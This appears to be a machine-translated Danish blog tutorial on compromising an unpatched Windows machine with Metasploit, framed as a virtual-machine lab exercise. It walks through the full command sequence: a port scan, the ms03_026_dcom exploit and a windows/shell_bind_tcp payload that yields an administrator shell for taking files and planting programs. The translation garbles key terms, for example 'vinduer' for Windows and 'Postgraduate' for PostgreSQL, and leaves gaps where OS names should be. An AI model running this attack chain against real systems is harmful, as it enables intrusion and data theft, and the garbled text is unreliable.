sådan hackes vinduer

sådan hackes vinduer. Faktisk stoppede Microsoft med at udstede opdateringer til dette operativsystem. Mange bruger dog stadig PC på deres computere. Da dette operativsystem ikke får fremtidige opdateringer, vil dets eksisterende sårbarheder altid være tilgængelige for hackere og penetrationstestere.

dette afsnit lærer dig, hvordan du angriber vinduer ved hjælp af Metasploit-rammen. Forfatteren antager, at du bruger , og at du har en virtuel maskine, der kører . Virtuelle maskiner giver dig mulighed for at køre flere operativsystemer (i dette tilfælde Der er mange instruktionsmaterialer vedrørende virtuelle maskiner på YouTube.

sørg for, at du bruger en virtuel maskine. Øvelse af denne hackingsteknik på en rigtig computer kan føre til alvorlige problemer. Hvis der sker noget dårligt på en virtuel maskine, kan du bare genstarte det ved at trykke på nogle knapper. At sprænge en faktisk computer kan på den anden side føre til reparationsomkostninger.

sådan hackes vinduer

du skal bryde ind i et netværk, før du hacker de computere, der er knyttet til det. Denne lektion kræver dog ikke noget netværksangreb. Det skyldes, at operativsystemet er installeret på din Kali-computer. Den virtuelle maskine hører således til dit computernetværk.

for at hacke en computer, skal du:

  • Start Metasploit-rammen i dit OS.

Start en terminal og type:

service postgresql start

denne kommando aktiverer Postgraduate på din computer. Postgraduate fungerer som database over Metasploit, så du skal køre det først, før du udløser selve programmet. Skriv nu:

service metasploit start

eller

msfconsole

hvis du gjorde alt rigtigt, skal din terminal se sådan ud:

  • Brug funktionen” port scan ” i Metasploit til at finde mål.

Metasploit-rammen leveres med forskellige hjælpeværktøjer. Portscanning er et af de bedste værktøjer, der findes i denne ramme. Dette værktøj giver dig mulighed for at scanne alle porte på en maskine. Det kan give dig detaljerede oplysninger om de åbne porte på dit mål. Som du ved, fungerer en havn som en døråbning for hackere. En åben port er en åben dør.

aktiver portscanning ved at indtaste denne kommando:

use auxiliary/scanner/portscan/tcp

Vis de tilgængelige scanningsindstillinger ved at skrive:

show options

som standard kontrollerer Port Scan hver port, der findes i systemet. Du ønsker ikke, at dette skal ske, da hele processen vil tage lang tid. Det ville være bedst, hvis du angiver rækkevidden af porte, der skal kontrolleres. Her er et eksempel:

set ports 1-600

nu skal du angive IP-adressen på dit mål. Dette trin er vanskeligt, da IP-adresser kan variere. I dette eksempel skal du få adgang til den virtuelle maskine og starte en kommandoprompt. Skriv “ipconfig” og søg efter maskinens IP-adresse. Lad os antage, at IP-adressen på din virtuelle maskine er 192.168.62.122.

gå tilbage til dit Kali OS og indtast følgende:

set RHOSTS 192.168.62.122

skriv” Kør ” for at starte processen. Metasploit viser alle de åbne porte, der findes i din virtuelle maskine. Hvis scanningen ikke viste nogen åbne porte, skal du gå tilbage til dit operativsystem og slukke for dets brandvæg. Kør derefter scanningen igen. Lad os antage, at scanningen opdagede to åbne porte: 135 og 445.

i praksis kender du ikke IP-adressen på dit mål. Det betyder, at du skal bruge NMAP til at finde mål og deres IP-adresser.

  • Søg efter udnyttelser.

dette er en af de vigtigste faser af angrebet. Du skal finde en udnyttelse, der virker på dit valgte mål. Afslut Portscanneren ved at skrive “tilbage”. Skriv “søg dcom “på hovedskærmen til msfconsole. “DCOM” – udnyttelsen er et af de bedste værktøjer, der kan bruges til at hacke en computer.

Metasploit viser dig søgeresultaterne. Kig efter modulet kaldet” udnytte/vinduer/dcerpc/ms03_026_dcom ” og kopiere sit navn. Skriv derefter følgende:

use exploit/windows/dcerpc/ms03_026_dcom

Vis de tilgængelige indstillinger ved at skrive:

show options

Angiv IP-adressen på dit mål. Her er koden:

set RHOST 192.168.62.122

Vælg nyttelasten for dit angreb. Nyttelasten bestemmer, hvad der vil ske, når du har overtrådt målets forsvar. Det kan indstille en åben terminal eller plante en virus. Der er tusindvis af nyttelast tilgængelige i Metasploit-rammen. For at finde den rigtige nyttelast til dit nuværende angreb skal du skrive:

payloads
  • den ideelle nyttelast til denne lektion er”vinduer/shell_bind_tcp”. Denne nyttelast åbner en skal (eller kommandoprompt) i målet via en TCP-port. Du kan indstille denne nyttelast ved at skrive:
set PAYLOAD windows/shell_bind_tcp
  • nu hvor du har angivet hvert aspekt af angrebet, skal du skrive “Kør”.

Metasploit fortæller dig, at der er åbnet en skal i din målcomputer. Denne shell giver dig administratorrettigheder over dit mål. Du kan hente filer fra den pågældende computer eller sende programmer til den. Du kan også få skærmbilleder af computeren, hvis du vil.

Hvordan Til At Hacke Vinduer Getastra Metode

Leave a Reply

Skriv et svar

Din e-mailadresse vil ikke blive publiceret.